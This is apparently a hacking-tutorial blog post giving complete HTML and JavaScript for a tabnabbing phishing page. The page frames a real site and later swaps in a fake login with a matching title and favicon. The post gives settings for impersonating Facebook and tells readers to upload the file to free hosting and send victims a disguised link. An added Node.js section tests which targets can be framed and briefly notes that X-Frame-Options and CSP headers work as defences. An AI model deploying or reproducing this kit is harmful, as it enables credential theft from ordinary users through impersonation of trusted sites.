First, sample code for tabnabbing with the help of iframes:
<!--
Title: Advanced Tabnabbing using IFRAMES and JavaScript
Author: De$trUcTiVe M!ND (lokesh@hackingloops.com)
Website: https://www.hackingloops.com
Version: 1.6
-->
<html>
<head>
<title></title>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
</head>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; // The "real" page shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; // Tab title shown while the "real" page is displayed
var FAKE_PAGE_URL = "https://www.hackingloops.com"; // URL of the fake (phishing) page loaded after the switch
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; // Tab title shown after the switch
var REAL_FAVICON = "http://www.google.com/favicon.ico"; // Favicon for the "real" page. It will not switch or clear in IE.
var FAKE_FAVICON = "https://www.hackingloops.com/favicon.ico"; // Favicon for the fake page
var TIME_TO_SWITCH_IE = 4000; // Milliseconds to wait in Internet Explorer after the tab loses focus before switching
var TIME_TO_SWITCH_OTHERS = 10000; // Milliseconds to wait in all other browsers (this timer starts at page load)
//--------------End Options-----------------
var TIMER = null;
var SWITCHED = false;
// Find the browser type: only Internet Explorer (MSIE token in the user agent) is special-cased
var BROWSER_TYPE = "";
if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)) {
  BROWSER_TYPE = "Internet Explorer";
}
// Set the "real" title and favicon so the tab looks like REAL_PAGE_URL
document.title = REAL_PAGE_TITLE;
if (REAL_FAVICON) {
  setFavicon(REAL_FAVICON);
}
// Create the iframe that holds the "real" page (the tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id = "tabnab";
el_tabnab.name = "tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute("src", REAL_PAGE_URL);
// Focus the iframe (in case the user does not click on it)
el_tabnab.focus();
// Wait to nab the tab!
if (BROWSER_TYPE == "Internet Explorer") {
  // IE: start the countdown when the iframe loses focus (the user left the tab); cancel it if focus returns
  el_tabnab.onblur = function () {
    TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
  };
  el_tabnab.onfocus = function () {
    if (TIMER) clearTimeout(TIMER);
  };
} else {
  // Other browsers: switch after a fixed delay, whether or not the user has left the tab
  setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function setFavicon(url) {
  // Remove any existing shortcut icon (iterating backwards, since the collection is live), then add the new one
  var head = document.getElementsByTagName("head")[0];
  var links = head.getElementsByTagName("link");
  for (var i = links.length - 1; i >= 0; i--) {
    if (links[i].type == "image/x-icon" && links[i].rel == "shortcut icon") {
      head.removeChild(links[i]);
    }
  }
  var link = document.createElement("link");
  link.type = "image/x-icon";
  link.rel = "shortcut icon";
  link.href = url;
  head.appendChild(link);
}
function TabNabIt() {
  if (!SWITCHED) {
    SWITCHED = true; // switch only once, even if onblur fires again
    // Redirect the iframe to FAKE_PAGE_URL
    el_tabnab.src = FAKE_PAGE_URL;
    // Change the title to FAKE_PAGE_TITLE and the favicon to FAKE_FAVICON
    if (FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
    // Changing the favicon does not work in IE, so only do it elsewhere
    if (BROWSER_TYPE != "Internet Explorer") {
      setFavicon(FAKE_FAVICON);
    }
  }
}
</script>
</body>
</html>
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : the URL of your fake (phishing) page
4. FAKE_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : your fake page URL/favicon.ico (Note: it is better to upload the Facebook favicon, so the switch is harder to notice)
7. BROWSER_TYPE : filled in by the script itself from navigator.userAgent ("Internet Explorer" or empty); there is nothing to edit here.
8. TIME_TO_SWITCH_IE : milliseconds to wait, after the tab loses focus in Internet Explorer, before switching to the fake page.
9. TIME_TO_SWITCH_OTHERS : milliseconds to wait before switching to the fake page in all other browsers; this timer starts as soon as the page loads, whether or not the user has left the tab.
As explained earlier, you can use this technique against anything: email accounts, Facebook, or other social networking websites. You just need to edit the options listed above, save the file as anyname.htm, and upload it to any free web hosting site along with the favicon file, then send the link to the user by email or chat message (hidden behind anchor text with an href in HTML, or disguised using some other technique).
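One check a tester runs before any of this: the technique only works if REAL_PAGE_URL agrees to be loaded inside an iframe. A target that sends X-Frame-Options: DENY, or a Content-Security-Policy frame-ancestors directive that excludes your host, renders a blank frame instead of the "real" page, and the switch has nothing to hide behind. The following Node.js function is an added example, not code from the original post, that applies the browser rules (CSP Level 3 frame-ancestors overriding X-Frame-Options; the HTML spec's X-Frame-Options check) to a target's response headers and a parent URL. The URLs login.target.example, free-host.example and partner.example, and every header set, are constructed for illustration.

```javascript
// Added example, not code from the original post: given the HTTP response headers
// of the page you want to load as REAL_PAGE_URL, decide whether a parent document
// at parentUrl is allowed to show it in an <iframe>. If the answer is false, the
// tabnab iframe renders blank and the switch has nothing to hide behind.
// Semantics follow CSP Level 3 (a frame-ancestors directive, when present,
// overrides X-Frame-Options) and the HTML spec's X-Frame-Options check.
// Simplifications: ports in host-sources are ignored, a host-source without a
// scheme is matched by http or https, and only one ancestor (the direct parent)
// is checked. All URLs and header sets below are constructed, not captured.

function headerMap(headers) {
  // Header names are case-insensitive; normalise them once.
  const map = {};
  for (const [name, value] of Object.entries(headers)) map[name.toLowerCase()] = String(value);
  return map;
}

function frameAncestors(csp) {
  // Return the frame-ancestors source list from a CSP header value, or null if the directive is absent.
  if (!csp) return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
  }
  return null;
}

function sourceMatches(source, parent, page) {
  // Match one frame-ancestors source expression against the parent document's URL.
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return parent.origin === page.origin;
  if (s === "*") return /^https?:$/.test(parent.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return parent.protocol === s;          // scheme-source, e.g. "https:"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)/.exec(s);     // host-source
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme ? parent.protocol !== scheme + ":" : !/^https?:$/.test(parent.protocol)) return false;
  return wildcard ? parent.hostname.endsWith("." + host) : parent.hostname === host;
}

function canBeFramed(headers, pageUrl, parentUrl) {
  const h = headerMap(headers);
  const page = new URL(pageUrl);
  const parent = new URL(parentUrl);
  const ancestors = frameAncestors(h["content-security-policy"]);
  if (ancestors) {
    // frame-ancestors is authoritative; X-Frame-Options is ignored when it is present.
    return ancestors.some((src) => sourceMatches(src, parent, page));
  }
  const values = [...new Set((h["x-frame-options"] || "").split(",").map((v) => v.trim().toUpperCase()).filter(Boolean))];
  if (values.length > 1) return false;                    // more than one distinct value: browsers block
  if (values[0] === "DENY") return false;
  if (values[0] === "SAMEORIGIN") return parent.origin === page.origin;
  return true; // no header, or an unrecognised value such as the obsolete ALLOW-FROM: framing is allowed
}

// Constructed sample responses for a hypothetical target login page.
const TARGET_PAGE = "https://login.target.example/";
const SAMPLE_RESPONSES = {
  noHeaders:   {},
  denyAll:     { "X-Frame-Options": "DENY" },
  sameOrigin:  { "x-frame-options": "sameorigin" },
  cspNoneWins: { "X-Frame-Options": "ALLOWALL",
                 "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" },
  cspPartners: { "Content-Security-Policy": "frame-ancestors 'self' https://*.partner.example" },
  conflicting: { "X-Frame-Options": "DENY, SAMEORIGIN" },
};

// Which of the sample responses could a tabnab page hosted at attackerUrl frame? Returns {name: boolean}.
function framingReport(attackerUrl) {
  const report = {};
  for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
    report[name] = canBeFramed(headers, TARGET_PAGE, attackerUrl);
  }
  return report;
}

console.table(framingReport("https://free-host.example/anyname.htm"));
```

Run it with node and only the noHeaders response comes back true for a page hosted on the free host; the same function returns true for cspPartners when the parent is https://sso.partner.example, which is the point of frame-ancestors: the target, not the attacker, chooses who may embed it. On the defending side, the same two headers on your own login page are what stop it being used as the "real" page in a tabnab.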
curious says
Interesting and very useful stuff. I am really passionate about learning hacking; I will try to implement it on test accounts and see. Could you mail me personally? I will be very glad.